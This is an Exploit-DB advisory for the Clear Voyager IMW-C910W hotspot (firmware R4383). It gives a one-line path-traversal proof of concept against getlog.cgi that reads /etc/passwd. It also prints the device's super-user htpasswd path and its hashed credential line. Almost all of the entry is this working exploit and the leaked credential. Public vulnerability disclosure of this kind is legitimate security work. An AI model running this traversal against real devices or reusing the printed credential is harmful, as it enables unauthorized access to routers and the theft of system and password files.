Clear Voyager Hotspot IMW-C910W - Arbitrary File Disclosure

2016-07-15T00:00:00
ID EDB-ID:40112
Type exploitdb
Reporter Damaster
Modified 2016-07-15T00:00:00

Description

Clear Voyager Hotspot IMW-C910W - Arbitrary File Disclosure. Webapps exploit for CGI platform

                                        
                                            - # Exploit Title: clear voyager hotspot IMW-C910W - file disclosure
- # Date: 2016/jul/15
- # Exploit Author: Damaster
- # Vendor Homepage: https://www.sprint.com/
- # Software Link: https://web.archive.org/web/20150526042938/http://www.clearwire.com/downloads/IMW-C910W_V2234_R4383A.bin
- # Version: R4383
-  
- poc : http://192.168.1.1/cgi-bin/getlog.cgi?filename=../../etc/passwd
-  
- vulnerable Device Software Version : R4383
-  
- super user password
- =================
- file : /etc/httpd/super.htpasswd
- content : super:YBfFG25mEAdSg
- =================